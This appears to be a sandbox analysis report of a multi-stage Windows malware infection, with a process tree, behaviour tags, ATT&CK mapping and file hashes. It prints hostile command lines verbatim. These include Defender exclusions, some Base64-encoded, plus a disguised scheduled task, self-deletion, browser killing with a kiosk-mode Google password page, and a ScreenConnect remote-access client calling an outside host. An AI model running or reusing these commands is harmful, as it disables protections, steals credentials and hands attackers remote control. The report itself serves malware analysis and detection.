C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1524
-
-
-
C:\Users\Admin\AppData\Local\Temp\1017680001\ga70pjP.exe"C:\Users\Admin\AppData\Local\Temp\1017680001\ga70pjP.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:680 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\98a59bd0eed9222b\ScreenConnect.ClientSetup.msi"5⤵
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2304
-
-
-
C:\Users\Admin\AppData\Local\Temp\1017763001\INOKWGC.exe"C:\Users\Admin\AppData\Local\Temp\1017763001\INOKWGC.exe"4⤵
- Executes dropped EXE
PID:1940
-
-
C:\Users\Admin\AppData\Local\Temp\1017855001\8ZVMneG.exe"C:\Users\Admin\AppData\Local\Temp\1017855001\8ZVMneG.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1728 -
C:\Users\Admin\AppData\Local\Temp\1017855001\8ZVMneG.exe"C:\Users\Admin\AppData\Local\Temp\1017855001\8ZVMneG.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2752
-
-
-
C:\Users\Admin\AppData\Local\Temp\1017916001\UZAj8wc.exe"C:\Users\Admin\AppData\Local\Temp\1017916001\UZAj8wc.exe"4⤵
- Drops startup file
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2980 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAMQAwADEANwA5ADEANgAwADAAMQBcAFUAWgBBAGoAOAB3AGMALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAMQAwADEANwA5ADEANgAwADAAMQBcAFUAWgBBAGoAOAB3AGMALgBlAHgAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAEEAcABwAHIAbwB4AGkAbQBhAHQAZQBTAGkAegBlAC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAEEAcABwAHIAbwB4AGkAbQBhAHQAZQBTAGkAegBlAC4AZQB4AGUA5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4996
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2980 -s 9685⤵
- Loads dropped DLL
- Program crash
PID:5940
-
-
-
C:\Users\Admin\AppData\Local\Temp\1017975001\b0b45e7a6c.exe"C:\Users\Admin\AppData\Local\Temp\1017975001\b0b45e7a6c.exe"4⤵
- Executes dropped EXE
PID:6788
-
-
C:\Users\Admin\AppData\Local\Temp\1017977001\02d487f7c7.exe"C:\Users\Admin\AppData\Local\Temp\1017977001\02d487f7c7.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:3280
-
-
C:\Users\Admin\AppData\Local\Temp\1017984001\77ce657d01.exe"C:\Users\Admin\AppData\Local\Temp\1017984001\77ce657d01.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4688 -
C:\Users\Admin\AppData\Local\Temp\1017984001\77ce657d01.exe"C:\Users\Admin\AppData\Local\Temp\1017984001\77ce657d01.exe"5⤵
- Executes dropped EXE
PID:3536
-
-
C:\Users\Admin\AppData\Local\Temp\1017984001\77ce657d01.exe"C:\Users\Admin\AppData\Local\Temp\1017984001\77ce657d01.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3548
-
-
-
C:\Users\Admin\AppData\Local\Temp\1017985001\08d1669db1.exe"C:\Users\Admin\AppData\Local\Temp\1017985001\08d1669db1.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5260
-
-
C:\Users\Admin\AppData\Local\Temp\1017986001\a1740268cc.exe"C:\Users\Admin\AppData\Local\Temp\1017986001\a1740268cc.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5840
-
-
C:\Users\Admin\AppData\Local\Temp\1017987001\36e225cffd.exe"C:\Users\Admin\AppData\Local\Temp\1017987001\36e225cffd.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:6452 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath "C:\pmrkx"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:6692
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:680
-
-
-
C:\Users\Admin\AppData\Local\Temp\1017988001\8904b059d8.exe"C:\Users\Admin\AppData\Local\Temp\1017988001\8904b059d8.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2316 -
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"5⤵
- Loads dropped DLL
PID:3096 -
C:\Windows\system32\mode.commode 65,106⤵PID:3152
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e file.zip -p24291711423417250691697322505 -oextracted6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3168
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_7.zip -oextracted6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3212
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_6.zip -oextracted6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3260
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_5.zip -oextracted6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3300
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_4.zip -oextracted6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3344
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_3.zip -oextracted6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3380
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_2.zip -oextracted6⤵
- Executes dropped EXE
PID:3424
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_1.zip -oextracted6⤵
- Executes dropped EXE
PID:3460
-
-
C:\Windows\system32\attrib.exeattrib +H "in.exe"6⤵
- Views/modifies file attributes
PID:3516
-
-
C:\Users\Admin\AppData\Local\Temp\main\in.exe"in.exe"6⤵
- Executes dropped EXE
PID:3524 -
C:\Windows\system32\attrib.exeattrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe7⤵
- Views/modifies file attributes
PID:3560
-
-
C:\Windows\system32\attrib.exeattrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe7⤵
- Views/modifies file attributes
PID:3576
-
-
C:\Windows\system32\schtasks.exeschtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE7⤵
- Scheduled Task/Job: Scheduled Task
PID:3592
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell ping 127.0.0.1; del in.exe7⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3608 -
C:\Windows\system32\PING.EXE"C:\Windows\system32\PING.EXE" 127.0.0.18⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:10584
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1017989001\02e4c18c72.exe"C:\Users\Admin\AppData\Local\Temp\1017989001\02e4c18c72.exe"4⤵
- Enumerates VirtualBox registry keys
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:10348
-
-
C:\Users\Admin\AppData\Local\Temp\1017990001\1fdc12c3d0.exe"C:\Users\Admin\AppData\Local\Temp\1017990001\1fdc12c3d0.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:10664 -
C:\Users\Admin\AppData\Local\Temp\1017990001\1fdc12c3d0.exe"C:\Users\Admin\AppData\Local\Temp\1017990001\1fdc12c3d0.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2856
-
-
-
C:\Users\Admin\AppData\Local\Temp\1017991001\8d2b699a41.exe"C:\Users\Admin\AppData\Local\Temp\1017991001\8d2b699a41.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:10800
-
-
C:\Users\Admin\AppData\Local\Temp\1017992001\caee26767d.exe"C:\Users\Admin\AppData\Local\Temp\1017992001\caee26767d.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:10980 -
C:\Users\Admin\AppData\Local\Temp\1017992001\caee26767d.exe"C:\Users\Admin\AppData\Local\Temp\1017992001\caee26767d.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:11072
-
-
-
C:\Users\Admin\AppData\Local\Temp\1017993001\a009087586.exe"C:\Users\Admin\AppData\Local\Temp\1017993001\a009087586.exe"4⤵
- Executes dropped EXE
PID:11224
-
-
C:\Users\Admin\AppData\Local\Temp\1017994001\eb73c920fa.exe"C:\Users\Admin\AppData\Local\Temp\1017994001\eb73c920fa.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3756 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath "C:\fujjrkmapd"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3744
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5356
-
-
-
C:\Users\Admin\AppData\Local\Temp\1017995001\530b5596f6.exe"C:\Users\Admin\AppData\Local\Temp\1017995001\530b5596f6.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:6204
-
-
C:\Users\Admin\AppData\Local\Temp\1017996001\cf68e84021.exe"C:\Users\Admin\AppData\Local\Temp\1017996001\cf68e84021.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2112
-
-
C:\Users\Admin\AppData\Local\Temp\1017997001\5fd6925fa4.exe"C:\Users\Admin\AppData\Local\Temp\1017997001\5fd6925fa4.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:7128 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:2688
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:1720
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:3172
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:4476
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:2440
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking5⤵PID:4160
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking6⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2140 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2140.0.1598087842\57287049" -parentBuildID 20221007134813 -prefsHandle 1220 -prefMapHandle 1212 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a5a75564-3ad2-4a71-8a9a-9895581cafd2} 2140 "\\.\pipe\gecko-crash-server-pipe.2140" 1296 14a06558 gpu7⤵PID:5184
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2140.1.2131952547\1659974851" -parentBuildID 20221007134813 -prefsHandle 1500 -prefMapHandle 1496 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8963bcd4-5d60-4167-ae7f-62b82d66808c} 2140 "\\.\pipe\gecko-crash-server-pipe.2140" 1512 111fca58 socket7⤵PID:5532
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2140.2.845680683\854013665" -childID 1 -isForBrowser -prefsHandle 2100 -prefMapHandle 2096 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 840 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {80a70037-aa2a-4fd7-ade1-0eebd21e8d70} 2140 "\\.\pipe\gecko-crash-server-pipe.2140" 2112 19aa0058 tab7⤵PID:2268
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2140.3.598088173\418818974" -childID 2 -isForBrowser -prefsHandle 2900 -prefMapHandle 2896 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 840 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1658d558-f4ee-4503-9c15-c3aaa2f742e0} 2140 "\\.\pipe\gecko-crash-server-pipe.2140" 2912 1dcb4558 tab7⤵PID:7772
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2140.4.984287445\1364818881" -childID 3 -isForBrowser -prefsHandle 2836 -prefMapHandle 3116 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 840 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {37b6e6cc-105d-41f1-8a87-8e6b9299d039} 2140 "\\.\pipe\gecko-crash-server-pipe.2140" 3812 1fd7bb58 tab7⤵PID:9468
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2140.5.1034588739\1571592605" -childID 4 -isForBrowser -prefsHandle 3936 -prefMapHandle 3940 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 840 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {757fd711-f1a3-48b2-a011-c37ffa5b531e} 2140 "\\.\pipe\gecko-crash-server-pipe.2140" 3928 201fb558 tab7⤵PID:9484
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2140.6.1019346328\317514970" -childID 5 -isForBrowser -prefsHandle 4108 -prefMapHandle 4112 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 840 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {085c8a5d-b75f-4ada-8785-d49ec9a045df} 2140 "\\.\pipe\gecko-crash-server-pipe.2140" 4092 201fd958 tab7⤵PID:9504
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1017998001\cd12090932.exe"C:\Users\Admin\AppData\Local\Temp\1017998001\cd12090932.exe"4⤵
- Modifies Windows Defender Real-time Protection settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3804
-
-
-
-
C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsClient.exe"C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsClient.exe"2⤵
- Executes dropped EXE
PID:6292
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Boot or Logon Autostart Execution: Authentication Package
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:580 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding E9D7F5961BFC63812427DF38F1DCC1DC C2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:376 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSIB5A9.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_259438102 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:640
-
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding CD29DF24C75E515C3CB7465359D085DD2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2208
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 56B2E12D0E85BB15C22795AAA4F3278C M Global\MSI00002⤵
- Loads dropped DLL
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:1612
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:1708
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot19" "" "" "61530dda3" "0000000000000000" "00000000000005EC" "00000000000003D4"1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:7064
-
C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.ClientService.exe"C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=gips620.top&p=8880&s=7333f63c-2cb1-4fe8-acd5-211dab881baa&k=BgIAAACkAABSU0ExAAgAAAEAAQDpOwIVy34yVx7xLDnH6rBeYx7mmiLN2yQyIYdJTxYIVHOsytxx89D0YKoH68EoEXToTuDpMmwJb%2bhrlJ3faNFTpvu7W8w3%2fxYUdeWuXWg%2bTQxXr6EWby912nykdroWfBxDx6Lmxg1gxGgRJHC8Oc96zV%2fiaqo5GlyagtszKkrbPOWW4FBVQPXhlUfH4mlFE0i0vcMxGginTYl8IjGBzr94ANeAXwajoe9Cjam2haoL%2f%2bgHMtFYBZJisALFnyX3zECpRv7vqWzNAQJYIqY6qDuC2lEbs0NtuBMSfQRW1t0ZOk7cEzuQjq72QbWf1bR8rZf%2b0t3VNSgkIUcBljvpSRK7&c=VIRUS101&c=https%3a%2f%2ft.me%2fvirus101Screenconnect&c=PC%20RAT&c=PC%20RAT&c=&c=&c=&c="1⤵
- Sets service image path in registry
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2984 -
C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsClient.exe"C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsClient.exe" "RunRole" "92fd7e28-665a-4169-bc10-0502ef9c0e37" "User"2⤵
- Executes dropped EXE
PID:4188
-
-
C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsClient.exe"C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsClient.exe" "RunRole" "be5eaa52-dc00-4cff-baca-835bc0494257" "System"2⤵
- Executes dropped EXE
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:4500
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {FE6F4579-448E-4B8F-B80A-28F6D5FD3B90} S-1-5-21-1488793075-819845221-1497111674-1000:UPNECVIU\Admin:Interactive:[1]1⤵PID:8872
-
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exeC:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:10068 -
C:\Windows\explorer.exeexplorer.exe3⤵PID:10204
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe3⤵
- Drops file in System32 directory
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5148 -
C:\Windows\system32\PING.EXE"C:\Windows\system32\PING.EXE" 127.1.10.14⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5436
-
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
3Authentication Package
1Registry Run Keys / Startup Folder
2Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Component Object Model Hijacking
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
3Authentication Package
1Registry Run Keys / Startup Folder
2Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Component Object Model Hijacking
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Hide Artifacts
1Hidden Files and Directories
1Impair Defenses
2Disable or Modify Tools
2Modify Registry
5Subvert Trust Controls
1Install Root Certificate
1Virtualization/Sandbox Evasion
3Discovery
Peripheral Device Discovery
1Query Registry
9Remote System Discovery
1System Information Discovery
5System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Virtualization/Sandbox Evasion
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
213KB
MD5eb35d4006f504b5296ef49d5340c523a
SHA10ac7af26025b1a0dde6848bcae544b4d90d64e11
SHA25618b09f35d48ed94bd212df8fb0e69ba996cb2839ffdf11ee185e991f6b27b6d7
SHA5124b9366a110e4b3ff80e77b6281d0fbb41f25c7e148c605e91ca1e57e0d9c8f0bf2fc084dabb15843bec0410d0b7103dfc1906b13c5e44bd5f20606497f5c0f8e
-
Filesize
48KB
MD5d524e8e6fd04b097f0401b2b668db303
SHA19486f89ce4968e03f6dcd082aa2e4c05aef46fcc
SHA25607d04e6d5376ffc8d81afe8132e0aa6529cccc5ee789bea53d56c1a2da062be4
SHA512e5bc6b876affeb252b198feb8d213359ed3247e32c1f4bfc2c5419085cf74fe7571a51cad4eaaab8a44f1421f7ca87af97c9b054bdb83f5a28fa9a880d4efde5
-
Filesize
66KB
MD55db908c12d6e768081bced0e165e36f8
SHA1f2d3160f15cfd0989091249a61132a369e44dea4
SHA256fd5818dcdf5fc76316b8f7f96630ec66bb1cb5b5a8127cf300e5842f2c74ffca
SHA5128400486cadb7c07c08338d8876bc14083b6f7de8a8237f4fe866f4659139acc0b587eb89289d281106e5baf70187b3b5e86502a2e340113258f03994d959328d
-
Filesize
93KB
MD575b21d04c69128a7230a0998086b61aa
SHA1244bd68a722cfe41d1f515f5e40c3742be2b3d1d
SHA256f1b5c000794f046259121c63ed37f9eff0cfe1258588eca6fd85e16d3922767e
SHA5128d51b2cd5f21c211eb8fea4b69dc9f91dffa7bb004d9780c701de35eac616e02ca30ef3882d73412f7eab1211c5aa908338f3fa10fdf05b110f62b8ecd9d24c2
-
C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsAuthenticationPackage.dll
Filesize254KB
MD55adcb5ae1a1690be69fd22bdf3c2db60
SHA109a802b06a4387b0f13bf2cda84f53ca5bdc3785
SHA256a5b8f0070201e4f26260af6a25941ea38bd7042aefd48cd68b9acf951fa99ee5
SHA512812be742f26d0c42fdde20ab4a02f1b47389f8d1acaa6a5bb3409ba27c64be444ac06d4129981b48fa02d4c06b526cb5006219541b0786f8f37cf2a183a18a73
-
C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsCredentialProvider.dll
Filesize822KB
MD5be74ab7a848a2450a06de33d3026f59e
SHA121568dcb44df019f9faf049d6676a829323c601e
SHA2567a80e8f654b9ddb15dda59ac404d83dbaf4f6eafafa7ecbefc55506279de553d
SHA5122643d649a642220ceee121038fe24ea0b86305ed8232a7e5440dffc78270e2bda578a619a76c5bb5a5a6fe3d9093e29817c5df6c5dd7a8fbc2832f87aa21f0cc
-
Filesize
3KB
MD59322751577f16a9db8c25f7d7edd7d9f
SHA1dc74ad5a42634655bcba909db1e2765f7cddfb3d
SHA256f1a3457e307d721ef5b63fdb0d5e13790968276862ef043fb62cce43204606df
SHA512bb0c662285d7b95b7faa05e9cc8675b81b33e6f77b0c50f97c9bc69d30fb71e72a7eaf0afc71af0c646e35b9eadd1e504a35d5d25847a29fd6d557f7abd903ab
-
Filesize
931B
MD5e190ad2c95cef560dd7fba3e0399346d
